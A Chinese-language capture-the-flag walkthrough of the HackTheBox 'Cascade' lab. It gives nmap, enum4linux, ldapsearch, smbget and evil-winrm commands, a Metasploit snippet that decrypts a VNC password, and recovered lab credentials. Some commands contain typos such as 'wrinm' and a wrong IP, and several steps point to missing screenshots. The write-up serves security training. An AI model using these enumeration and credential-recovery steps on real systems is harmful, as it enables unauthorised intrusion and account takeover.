Cascade是一个内网综合性很强的靶场,涉及的知识点有ldap枚举,smb枚举,.net逆向,sqlit数据库在渗透中的运用等……
一、信息收集
先端口扫描:
nmap -v -sT -Pn --min-rate=1000 -oA cascade.nmap 10.129.128.181
发现389(ldap)和445(smb)
139端口开放,Samba服务,可能存在爆破/未授权访问/远程命令执行漏洞。445端口开发,smb服务,可能存在永恒之蓝漏洞MS17-010。smbclient-由于身份验证限制而无法枚举共享-无效crackmapexec-无法枚举共享,没有密码-无效enum4linux-列出的用户,但与密码无关-有效389端口开放,ldap目录访问协议,可能存在注入/未授权访问/弱口令。5985端口开发,WinRM服务。
所以,enum4linux列举出可能可用的smb登录的用户和rpc用户信息:
这里的用户信息是不是很乱呢?给出了一种美化的方法:
cat domainuser.txt| awk -F [ '{print $2}'| awk -F ] '{print $1}'//提取用户名
得到一堆用户:
CascGuestarksvcs.smithr.thompsonutilj.wakefields.hicksonj.goodhanda.turnbulle.croweb.hansond.burmanBackupSvcj.alleni.croft
二、ldap枚举
看到ldap,基本会想到两种攻击手法:1、ldap注入 2、ldap枚举
sudo ldapsearch -x -h 10.192.128.181 -b "dc=CASCADE,dc=local"得到ldap枚举的信息如下:
有理由相信,这是一台叫做cascade.local的靶机,在域环境下,用户名为r.thompson:
对密码bs64解密:
echo -n "clk0bjVldmE==" | base64 -d得到账密如下:
r.thompsonrY4n5eva
三、smb登录
这里太卡了所以用proxychains:
用smbget下载文件:(重启了ip变化为10.129.112.64)
smbget -R --update smb://10.129.112.64/print$ -U 'r.thompson'
逐个下载完之后查看,发现vnc的有关文件:
strings查看reg文件:
发现密码,不过要解密,网上给出了2种方法,vncview或者msf,这里用msf:
msf6>irb[*] Starting IRB shell...[*] You are in the "framework" object>> fixedkey = "x17x52x6bx06x23x4ex58x07"=> "u0017Rku0006#NXa">> require 'rex/proto/rfb'=> true>> Rex::Proto::RFB::Cipher.decrypt ["6BCF2A4B6E5ACA0F"].pack('H*'), fixedkey=> "sT333ve2"
得到密码:sT333ve2
四、wrinm登录
因为目标开放了5895的wrinm,这里协议可以理解为shell形式的图形化界面,和3389一样,而vnc的默认端口是5800,5900等,所以可以试试登录,并且值得注意的是:wrinm在winNT以后默认开启,都可以试试吼!
evil-wrinm -u s.smith -p sT333ve2 -i 10.129.112.64
五、获取userflag
六、sqlite信息收集
sqlitbower打开数据库文件:
dnspy逆向分析:
然后winrinm登录:
发现了AD recycle bin ,也就就是说,可能存在删除了的信息,恢复即可,这里存在AD recycle bin提权:
注意到有passwd,bs64解密:
baCT3r1aN00dles
用administrator登录试试??
OK!
原文始发于微信公众号(Haking水友攻防实验室):靶场实战|hackthebox-cascade
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论